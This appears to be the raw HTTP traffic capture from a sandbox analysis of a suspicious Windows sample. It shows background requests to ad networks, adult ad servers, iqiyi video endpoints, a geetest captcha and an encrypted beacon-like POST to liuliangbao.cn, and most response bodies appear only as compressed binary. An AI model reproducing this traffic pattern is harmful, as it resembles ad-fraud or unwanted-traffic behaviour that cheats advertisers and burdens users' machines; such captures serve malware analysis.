.g~..-\..>.2...............k.7q.i..$.......v...g. ...?...).......7a
...c}.A.....[.}..//^...%5.kj4....<.Q}.%....z.a...<C.l ...R....-.
_..7.e.b..K.`=.... HI....7.79.....XSr...0..:(Z.QB1W ....$$p3qA..v..t}`
.j.....n.VU....|>...>..N.@6sE..`..q.|.@m".n.....Y.#....o[qn.<<< skipped >>>

GET /ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: blockadz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:18 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
2fb.............T[o.6.~..8.C#c.......h.nE...0......cI.L2$..u..wHY..v..
D....~.....~...W.(..xov~.#....y...v.}.....9....~#l......0B.N5...}....v
... m%Z.....".h..NS.......w..m..... .W..o`.. VN...b%....A.....gB...j.f
`..H/.[.....~....z\{Pzn.....B..kZ?.}H...e..h...K3o..-.....ri%..:......
.c9.=......^8W1..W.[..4S..{....a.Z\W......Zo...?....{&..NV.^.z.....~..
.._lY..9[...`z....Rh....C..dM.f..%....f>....|-..?D..9.]m;.O.z-.b.Ra
[a..-nQy..q....~S$I..T....`......R...ne....s..)=.=...$.3....=.8F..*3V{
]....X..q9....s..`.A>.r.Q6.f.-..6...n1v7..k..A......... W...=.@.kr5
...&... w..V^...K{.... ........NQ>....b.J?...>|...M..gfpm.OnE]..
....G ......yw..^$D.8.e..JO.H.......^.r...4.S......=.F. ....u.....EX..
....N.D.{j1N.8)$,'...=W......IV.W..(.q..J.=...T.Q\$..G..g...'s.G......
..>.........0..HTTP/1.1 200 OK..Server: nginx/1.4.6 (Ubuntu)..Date:
 Fri, 20 Jan 2017 09:55:18 GMT..Content-Type: text/html..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.9-1ubuntu
4.20..Content-Encoding: gzip..2fb.............T[o.6.~..8.C#c.......h.n
E...0......cI.L2$..u..wHY..v..D....~.....~...W.(..xov~.#....y...v.}...
..9....~#l......0B.N5...}....v... m%Z.....".h..NS.......w..m..... .W..
o`.. VN...b%....A.....gB...j.f`..H/.[.....~....z\{Pzn.....B..kZ?.}H...
e..h...K3o..-.....ri%..:.......c9.=......^8W1..W.[..4S..{....a.Z\W....
..Zo...?....{&..NV.^.z.....~...._lY..9[...`z....Rh....C..dM.f..%....f&
gt;....|-..?D..9.]m;.O.z-.b.Ra[a..-nQy..q....~S$I..T....`......R...ne.
...s..)=.=...$.3....=.8F..*3V{]....X..q9....s..`.A>.r.Q6.f.-..6<<< skipped >>>

GET /ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: blockadz.com

Connection: Keep-Alive

Cookie: __qca=P0-1340228538-1484906118834


HTTP/1.1 200 OK

Server: nginx/1.4.6 (Ubuntu)

Date: Fri, 20 Jan 2017 09:55:34 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.9-1ubuntu4.20

Content-Encoding: gzip
2fb.............T[o.6.~..8.C#c.......h.nE...0......cI.L2$..u..wHY..v..
D....~.....~...W.(..xov~.#....y...v.}.....9....~#l......0B.N5...}....v
... m%Z.....".h..NS.......w..m..... .W..o`.. VN...b%....A.....gB...j.f
`..H/.[.....~....z\{Pzn.....B..kZ?.}H...e..h...K3o..-.....ri%..:......
.c9.=......^8W1..W.[..4S..{....a.Z\W......Zo...?....{&..NV.^.z.....~..
.._lY..9[...`z....Rh....C..dM.f..%....f>....|-..?D..9.]m;.O.z-.b.Ra
[a..-nQy..q....~S$I..T....`......R...ne....s..)=.=...$.3....=.8F..*3V{
]....X..q9....s..`.A>.r.Q6.f.-..6...n1v7..k..A......... W...=.@.kr5
...&... w..V^...K{.... ........NQ>....b.J?...>|...M..gfpm.OnE]..
....G ......yw..^$D.8.e..JO.H.......^.r...4.S......=.F. ....u.....EX..
....N.D.{j1N.8)$,'...=W......IV.W..(.q..J.=...T.Q\$..G..g...'s.G......
..>.........0..HTTP/1.1 200 OK..Server: nginx/1.4.6 (Ubuntu)..Date:
 Fri, 20 Jan 2017 09:55:34 GMT..Content-Type: text/html..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.9-1ubuntu
4.20..Content-Encoding: gzip..2fb.............T[o.6.~..8.C#c.......h.n
E...0......cI.L2$..u..wHY..v..D....~.....~...W.(..xov~.#....y...v.}...
..9....~#l......0B.N5...}....v... m%Z.....".h..NS.......w..m..... .W..
o`.. VN...b%....A.....gB...j.f`..H/.[.....~....z\{Pzn.....B..kZ?.}H...
e..h...K3o..-.....ri%..:.......c9.=......^8W1..W.[..4S..{....a.Z\W....
..Zo...?....{&..NV.^.z.....~...._lY..9[...`z....Rh....C..dM.f..%....f&
gt;....|-..?D..9.]m;.O.z-.b.Ra[a..-nQy..q....~S$I..T....`......R...ne.
...s..)=.=...$.3....=.8F..*3V{]....X..q9....s..`.A>.r.Q6.f.-..6<<< skipped >>>

POST /ts/f3.1/ HTTP/1.1

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

User-Agent: llb/1.1.73.813

Host: ap3.liuliangbao.cn

Content-Length: 560

Connection: Keep-Alive

Cache-Control: no-cache

d=8abb5d730af4b0e4886c405e649eeb2ac7d8e09c424059533f70285ec782b96f4a4196baf083d2bb2ed52133cdc766c044824bbbfa2f654ddbc040b8919e2bfd9e42ba354b13e367aa87a20e181408cc1ec95f98b7bdf1822675ed6b4c228cc56cffa038740e4420424c4f18809ede302b59ea9443bf3c5010b911ad6f320df1e949659770ff3466a0951f17384a22db1137d52d860bcc6543d636bae2c9f963170c8ca7e01224032928d94b21f47f77da116d7e1d704286fa4a647632c1bf89b1a66526aa968ee10ce6cd90b6e225933bd9090eb69ffa885e9ef003966a2003c144bba22e03907fad8b8b24dd37784e7b10e761ce013cc46e0028a8c28849e79d354e436886e1a554fcf2cf6279284e7c4b1114976422
HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html;charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Content-Encoding: gzip

17............340...Pw#......0..HTTP/1.1 200 OK..Server: nginx..Date: 
Fri, 20 Jan 2017 09:55:06 GMT..Content-Type: text/html;charset=UTF-8..
Transfer-Encoding: chunked..Connection: keep-alive..Content-Encoding: 
gzip..17............340...Pw#......0..

GET /crossdomain.xml HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: cache.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: text/xml; charset=utf-8

Last-Modified: Wed, 01 Jul 2015 08:18:41 GMT

Transfer-Encoding: chunked

Connection: keep-alive

ETag: W/"5593a261-e3"

Expires: Sat, 21 Jan 2017 09:55:12 GMT

Cache-Control: max-age=86400

Content-Encoding: gzip
9d............e.K..0...E..V.H..O..D.Q#%u....'.lP..5o......T$....|1.p&l
t;t...Ep.... .....D%..h.. ..Ui...$.......ul...>...[.._.3...?lV]...A
.8..j.&......................0......


GET /vms?key=fvip&src=1702633101b340d8917a69cf8a4b8c7c&tvId=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&vinfo=1&tm=952&qyid=&puid=&authKey=bc6811ba189dbccef005d66f72770de2&um=0&pf=b6c13e26323c537d&thdk=&thdt=&rs=1&k_tag=1&qdx=n&qdv=2&vf=746cf15c43ca5b06081b3fa8a82442b0 HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: cache.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:13 GMT

Content-Type: application/json; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: no-cache

Content-Encoding: gzip
110f.............Zk...y.._...|..=.>.V......$62.J.XJu..6sc.gV..*0`$.
.(qQ....`*...l....A;......t...vwd..|p.R.......}...\.u}h.n,.......4....
1.....O.<.........H...2..e.Q..m.S|.E;.C3..DR.q....e.;..D.m2..4kR...
...P.H."c.F.I.L...=..J.q.Q...i..2...........Q.[.A....H.a....#..A....0.
9V.<#^.T....Mf.S...w...<6.b*C..*,.....bk.....z/.&.i\...$..j._>
;]..t..X............/...............&.....ub.].......C.'.I...>t.\..
.|...@.aX3}..ju..Z.B.3.'.a.`.K..B..i..p.4.pPu....6.......]....t.%.X...
f..3..4.........].i0....b.l.Xk....K-......0.. .(z.T..z..S/....pP...ly.
.~..k.k...>.......~.....V.....n.. [.:.."f.`IF.}. .z..Q..5.....$ ..p
......~....L.[K.G.._.0-;l/...Q.FWwn......2.h..Q.......,;(..n `.3.....z
.........o.....w./...k\l.....~......{W..........|....p...7...S.O......
........o.7......(.O..^..}...d..N.Qm.iC.m...S.N.$4}2].0..k.&...0.s...}
weie..J..L.9u?l......c..U..z...m........}..Z*.\-.-......d.....y*P..HZ#
.VY.)..3g.h....oA...Y.p]@..H.YnaPR.%s...............Az~...4....o.t...9
....i.d.s..2./Wv.m.?..g..x.x........n8..56n~.u{..7.l........^._.r..o.o
.r.....=]....H.q...C7..Q..P.Y@_...n..~...p....R.6......Q...%..,.....Q.
.....$..........)..n.,pz...p....W.^..0....0s.V1(wz$.t..yeiq._...6..z..
_l\.d.."...L.:..m..n...l|....s....L..X..=..=........m._..k.0..........
.i..d......I..1H....[E....a...;`..7..h.5nt.....5...wn|..m..u...X.k....
G...9q.;.4....._5.b1]....4..!4._.~.......k_.?.9.......................
.7n./..k G...us..;...#7..o.~ss..X......[.gb._.d..[....7..5..w/.8......
:......~|.c4.z...n..e....;...p.:.....W.?.........L.._.......)]..l|<<< skipped >>>

GET /sci/gm/3/572044000/?src=1702633101b340d8917a69cf8a4b8c7c HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: cache.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:14 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Fri, 20 Jan 2017 11:37:17 GMT

Cache-Control: max-age=7200

Access-Control-Allow-Credentials: true

Content-Encoding: gzip

23.............VJ.OIU.Rr4....Z..b........0..HTTP/1.1 200 OK..Server: o
penresty..Date: Fri, 20 Jan 2017 09:55:14 GMT..Content-Type: text/html
; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..E
xpires: Fri, 20 Jan 2017 11:37:17 GMT..Cache-Control: max-age=7200..Ac
cess-Control-Allow-Credentials: true..Content-Encoding: gzip..23......
.......VJ.OIU.Rr4....Z..b........0......

GET /jp/vi/572044000/787ab6983c8a883fa3c5190ce3cac804/?status=1&callback=window.Q.__callbacks__.cb2r2oc2 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: cache.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: openresty

Date: Fri, 20 Jan 2017 09:55:16 GMT

Content-Type: application/json; charset=utf-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: no-cache

Content-Encoding: gzip
6d7.............Wms.V......':..zq..~..;....K...f<7..."Y.teo&.LXHI..
a. K.B_.)......N..C$9......1)Ti.L=.....{.s.{..p'.Z.Q.[...ZMg.9...^...G
UW.u.....uC..*2}..Tg.I.S.7a.b........s...`i>j_....l|..Z...`b.......
........c.3..@..u.>........U9..:..5Z..WL.n..(....&.a...iC.n..a..L.^
.T...6.e$..'...|c.[..E...p....2...m...sE,......0.m.k..&TY)..J.*.S..ji@
)A...r.'.~#Y...n..ob1l.I..g...............W.F.......{&l.5...^=,..F....
....I..i4...R3...r..wzO.-......0.K..........g=Q.@....9...NI...LF..oTt.
.o.i....~v.s.[|.`o....o>.x........W...=..........0....Y\._..q...p.M
.....K..e.........f4./...I.9&.<.]..H<.....!<.Z.x.k...) ......
a.e.J8.'@.)......@5W.Y.`......$.......g.....z..V .....fM)...>.E9;!,
.....['.aczw..."\..&.K.|9_...M......&.1%..G.q...BS1aD.P.TQ..DUSE...J.*
....EZ.(..G.KuWN..R%...td.8R:F...GD#.Pj.'..HxH%t.E.O..{.............K.
.fxq.._...,.1...*t..8..3.Q}.....M.M[.Y..R..A..w..Z|.0.kT.q......cAQT..
....Q....hZQ i5.V....d?p.im&.q..D.n.n..\...w.lfz9;#gz....8|#qA.9E...^.
...X.....Q...Qd..Q~. R|.[_...h...(...j1...g}}........#E..{.....(;&.f..
pS.A.?.....W2....m.....e/h..q.vO.~....O.E..r...0.@NM../........U.DP,..
h.\... ..1...JY..MgzI.CQ4.&.1.....9}A.......6.....>..m..lt1.k.b._..
^....u.....p..K...}......}:l.m....Q.........f..pa=x.C..W.....>....w
>|...5.....W. .8..O..1..]........Y.,/.K.;.Pg.K....B.....{..>.W7.
.s.......4.."...u....m|..g9z......no....<..'...v2..#...p.M...L..T2L
.?......4...x1...1..HFO0...fu.#.D.....N........Q..."?=..{.M...N...A5..
j:.....6.O.@.z."..iH.6<.i .p3..T... ....q..3....Mn..)E..v.^.<<<< skipped >>>

GET /quant.js HTTP/1.1

Accept: */*

Referer: hXXp://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: edge.quantserve.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Fri, 15 Jul 2016 22:07:37 GMT

Accept-Ranges: bytes

Content-Length: 3094

Content-Type: application/x-javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Cache-Control: private, max-age=86400

Expires: Sat, 21 Jan 2017 09:55:18 GMT

Date: Fri, 20 Jan 2017 09:55:18 GMT

Connection: keep-alive
....T.uW..quant.js...ks.........dH....,...ri'7....~r].D."c...H.O....A.
..4....b..]..>.3.XV.u.N........g.?.pG....E.2@. o...$K....md......:l
...rTJ.=..rc..\..rW0.....G8......6.\..<.Q...1I....6.)[&."bYYX.....x
...Y&...........]]..P....U....d:.PA.G?cF,..w7n...?;........}.....bmIp&
lt;.62..VT....r..g.....2F.}..v.L...S...E.;T... R&.).2&.......*.R0.!..5
.........'$.........C.".....`.z5\Nl.!..rc.o&..r..^..m..Zc....#....P\F.
..7\.e$...5...H...L..p.dHm..@.Sx.]........M.A.X.f...x6.....-...p...:..
.2.J......Y..B\j'.D.g.....U.....a...4sc......*..ex.....(.....O,P....&g
t;.n.x.Y........N..".x).....u........a...l8.}H...........Y.......o....
..\..B~&3M.isn....i...E.DWq4w....0..Bd.)PN,.....n.&..._..ZC.. j.ro..}~
1.O!"..*....!.xym..(......,0\#.\&qryuq.L.|.X....j...L...j../'.d...L1..
.$.....*!.dJ....X]\..`:.G0../..O.$.,`..W...f...f.\.....K..|..W.*X\HB.L
.....]p&V........q.VL...Sd.2>5aQ..%.E.p.P.......h.?H.....-p....5...
.!M.....mz....'.k.L2..@.D...j>...../)a..e.!6.<.3.......2.U...3.C
...<3......bW...w.>.T.B.$.gr.pD...&.H.. r........C..Hj.....#..."
....:H)...p0...`.0J..@.....3.QX...8.....&.k....q..m?*..(../.....[j....
T..~".d..SC'..t...`....~u..|....#....C.......Z..6ka....U...w....!.....
..x.B.........W...]1...`PG.e.{Hb..G.....C.....1...:,..H..'h...#.iX.>
;........Y..p........V>.).A.@x....b...<=.x..1 kH....k..;@5....GB
{....`., .Nw..y..M03M.....T~9|C......*.&.K.`:..7lres..JsM...e.H.......
......,XV..tR...\..|....a..OOb..z..v!4*..BN/.6..NLr..HA..'lq.1.G.#8.of
h:wN.....P`vG(2Bu@F..!.."4..R.......>E.T.!$m...E.........`-....<<< skipped >>>

GET /get.php?callback=gtcallback&_=1484906133801 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: api.geetest.com

Connection: Keep-Alive

Cookie: GeeTestUser=07ac12f44144929cb2ed91591893af57


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:34 GMT

Content-Type: text/javascript;charset=UTF-8

Content-Length: 2778

Connection: keep-alive

Cache-Control: no-cache, no-store, must-revalidate

Etag: "31b67ea84f8d1f83124ad7a043f831f08280500f"

Pragma: no-cache

Expires: 0
.(function () {.    var head = document.getElementsByTagName('head')[0
];.    var loadJS = function (url, callback) {.        var s = documen
t.createElement('script');.        var loaded = false;.        var onl
oad = function () {.            if (!loaded &&.                (!s.rea
dyState.                    || "loaded" === s.readyState.             
       || "complete" === s.readyState)) {.                loaded = tru
e;..                // setTimeout for IE10-.                setTimeout
(function () {.                    callback(false);.                },
 0);.            }.        };.        var onerror = function () {.    
        callback(true);.        };.        s.charset = 'UTF-8';.      
  s.id = 'gt_lib';.        s.async = false;.        s.onload = s.onrea
dystatechange = onload;.        s.onerror = onerror;.        s.src = u
rl;.        head.appendChild(s);.    };.    var normalizeDomain = func
tion (domain) {.        // return domain.replace(/^https?:\/\/|\/.*$/g
, '');.        return domain.replace(/^https?:\/\/|\/$/g, '');.    };.
    var normalizePath = function (path) {.        path = path.replace(
/\/ /g, '/');.        if (path.indexOf('/') !== 0) {.            path 
= '/'   path;.        }.        return path;.    };.    var makeURL = 
function (protocol, domain, path) {.        domain = normalizeDomain(d
omain);.        var url = normalizePath(path);.        if (domain) {. 
           url = protocol   domain   url;.        }.        return url
;.    };..    var load = function (protocol, domains, path, callba<<< skipped >>>

GET /get.php?gt=3386e03c620a4067f18fa92c370f1594&challenge=70635a5a34b073f557c9bcaabf1c81ec&product=embed&offline=false&lang=en&type=slide&callback=geetest_1484906140926 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: api.geetest.com

Connection: Keep-Alive

Cookie: GeeTestUser=07ac12f44144929cb2ed91591893af57


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:35 GMT

Content-Type: text/javascript;charset=UTF-8

Content-Length: 761

Connection: keep-alive

Etag: "4ef085f03d9e5539e81a458f630d5ef8d31b8937"

Pragma: no-cache

Expires: 0

Cache-Control: no-cache, no-store, must-revalidate

geetest_1484906140926({"theme": "golden", "type": "slide", "benchmark"
: false, "gt": "3386e03c620a4067f18fa92c370f1594", "show_delay": 250, 
"xpos": 0, "product": "embed", "feedback": "hXXp://VVV.geetest.com/con
tact#report", "fullbg": "pictures/gt/496156f80/496156f80.jpg", "apiser
ver": "hXXp://api.geetest.com/", "https": false, "clean": false, "link
": "", "hide_delay": 800, "staticservers": ["static.geetest.com/", "dn
-staticdown.qbox.me/"], "version": "5.10.0", "challenge": "70635a5a34b
073f557c9bcaabf1c81ecii", "slice": "pictures/gt/496156f80/slice/d5feb8
7a.png", "ypos": 0, "mobile": false, "bg": "pictures/gt/496156f80/bg/d
5feb87a.jpg", "logo": true, "theme_version": "3.2.0", "height": 116, "
fullpage": false, "id": "a70635a5a34b073f557c9bcaabf1c81ec"})HTTP/1.1 
200 OK..Server: nginx..Date: Fri, 20 Jan 2017 09:55:35 GMT..Content-Ty
pe: text/javascript;charset=UTF-8..Content-Length: 761..Connection: ke
ep-alive..Etag: "4ef085f03d9e5539e81a458f630d5ef8d31b8937"..Pragma: no
-cache..Expires: 0..Cache-Control: no-cache, no-store, must-revalidate
..geetest_1484906140926({"theme": "golden", "type": "slide", "benchmar
k": false, "gt": "3386e03c620a4067f18fa92c370f1594", "show_delay": 250
, "xpos": 0, "product": "embed", "feedback": "hXXp://VVV.geetest.com/c
ontact#report", "fullbg": "pictures/gt/496156f80/496156f80.jpg", "apis
erver": "hXXp://api.geetest.com/", "https": false, "clean": false, "li
nk": "", "hide_delay": 800, "staticservers": ["static.geetest.com/", "
dn-staticdown.qbox.me/"], "version": "5.10.0", "challenge": "70635

<<< skipped >>>

GET /refresh.php?challenge=70635a5a34b073f557c9bcaabf1c81ec6q&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906143640 HTTP/1.1

Accept: */*

Referer: hXXp://coinsns.com/index.php?s=/lottery/index/index.html

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.87 Safari/537.36 QQBrowser/9.2.5204.400

Host: api.geetest.com

Connection: Keep-Alive

Cookie: GeeTestUser=07ac12f44144929cb2ed91591893af57


HTTP/1.1 200 OK

Server: nginx

Date: Fri, 20 Jan 2017 09:55:36 GMT

Content-Type: text/javascript;charset=UTF-8

Content-Length: 353

Connection: keep-alive

Cache-Control: no-cache, no-store, must-revalidate

Etag: "d3da82caec0182115c4a6a301061ae742808497a"

Pragma: no-cache

Expires: 0
geetest_1484906143640({"id": "", "feedback": "hXXp://VVV.geetest..

GET /crossdomain.xml HTTP/1.1

Accept: */*

Accept-Language: en-US

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: data.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.9.4

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: text/xml

Content-Length: 261

Last-Modified: Wed, 27 Jul 2016 03:17:13 GMT

Connection: keep-alive

ETag: "579827b9-105"

Accept-Ranges: bytes
<?xml version="1.0" encoding="UTF-8"?>..<cross-domain-policy&
gt;.. <allow-access-from domain="*.qiyi.com"/>.. <allow-acces
s-from domain="*.iqiyi.com"/>.. <allow-access-from domain="*.pps
.tv"/>.. <allow-access-from domain="*.qiyi.domain"/>..</cr
oss-domain-policy>......


GET /uid?tn=0.896643178537488 HTTP/1.1

Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf

x-flash-version: 23,0,0,185

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: data.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.9.4

Date: Fri, 20 Jan 2017 09:55:12 GMT

Content-Type: text/html

Connection: keep-alive

Content-Length: 51

Cache-Control: no-cache

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true
var uid={"uid":"5088e17771f6d54476f95dc61f9e80b4"};HTTP/1.1 200 OK..Se
rver: nginx/1.9.4..Date: Fri, 20 Jan 2017 09:55:12 GMT..Content-Type: 
text/html..Connection: keep-alive..Content-Length: 51..Cache-Control: 
no-cache..Access-Control-Allow-Origin: *..Access-Control-Allow-Credent
ials: true..var uid={"uid":"5088e17771f6d54476f95dc61f9e80b4"};..

GET /vodpb.gif?type=piaoshhtestmayttf&des=h5p2ptest&brs=mozilla%2F4.0%20(compatible%3B%20msie%207.0%3B%20windows%20nt%205.1%3B%20trident%2F4.0%3B%20sv1%3B%20gtb7.3%3B%20u9dnfsh)%20qqbrowser%2F6.14.15493.201&mse=0&p2p=0&p=pc&_=1484906111480 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; GTB7.3; u9dnfsh) QQBrowser/6.14.15493.201

Host: msg.video.qiyi.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.8.0

Date: Fri, 20 Jan 2017 09:55:11 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive

HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Fri, 20 Jan 2017 09:55:11 
GMT..Content-Type: image/gif..Content-Length: 0..Connection: keep-aliv
e..

GET /ads?zone_id=1344011&ref=freemomboy.com&pid=60e5644c-fd9a-44a6-a46b-49c04e3effcd&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; chromeframe/22.0.1229.94; .NET CLR 2.0.50727)

Host: ads.trafficjunky.net

Connection: Keep-Alive

Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15


HTTP/1.1 200 OK

Date: Fri, 20 Jan 2017 09:55:06 GMT

Content-Type: text/html

Content-Length: 1691

Connection: close

Cache-Control: private, no-cache, no-cache, proxy-revalidate

Server: Logger/0.1

Set-Cookie: tj_UUID=b3da0bc7-5356-4cf4-8cd7-941025e2cf15; domain=.trafficjunky.net; path=/; Expires=Mon Jan 15 04:55:06 2018

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

Access-Control-Allow-Methods: GET,POST

Access-Control-Allow-Headers: Content-Type

Access-Control-Max-Age: 86400
<HTML><HEAD><script type="text/javascript"> var MAXI
MUM_DEPTH = 10;function mouseover(self){for(var i = 0; i < MAXIMUM_
DEPTH; i  ){var parent = getParent(window.parent, i);parent.postMessag
e({event: "mouseover", click_url:self.attributes.click_url.value}, "*"
);}}function mouseout(self){for(var i = 0; i < MAXIMUM_DEPTH; i  ){
var parent = getParent(window.parent, i);parent.postMessage({event:"mo
useout"}, "*");}}function getParent(e, i){if( i == 0){return e;}return
 getParent(e.parent, i - 1);}</script><TITLE>Ad delivery s
ystem</TITLE><meta name="keywords" content="1000232241" def="
1" z_id="1344011" ad_id="1189078351" qw="0" isave="yes" /> <meta
 name="description" content="" /> <style type="text/css"><
!-- a img   { border: 0; } body    { margin: 0; padding: 0; text-align
: center;} --> </style> </HEAD><BODY style="backgrou
nd-color:transparent;"><iframe onmouseover="mouseover(this);" on
mouseout="mouseout(this)" id="1344011_1484906106" name="1344011_148490
6106" src="hXXp://ads2.contentabc.com/ads?spot_id=2007013&rand=1853651
284&impid=53_1484906106522410_29323&uuid=b3da0bc7-5356-4cf4-8cd7-94102
5e2cf15" width="300" height="250" scrolling="no" frameborder="0" allow
transparency="true" marginwidth="0" marginheight="0" z_id="1344011" c_
id="1000232241"  ad_id="1189078351" def="1" qw="0" click_url="hXXp://a
ds.trafficjunky.net/click?url=iframe-click&click_data=QAAAAOQlAAB6
3oFYAAAAAAAAAAALghQAC4IUAAAAAAAxVZ47T-XfRs1OijwAAAAAAAAAAAABAAAAAA<<< skipped >>>

GET /ads?zone_id=1319961&ref=pornvideo-box.com&pid=1c7fd951-6162-4776-b70b-13bb84f94bba&ts=1484906106 HTTP/1.1

Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, */*

Accept-Language: en-US

Accept-Encoding: gzip, deflate

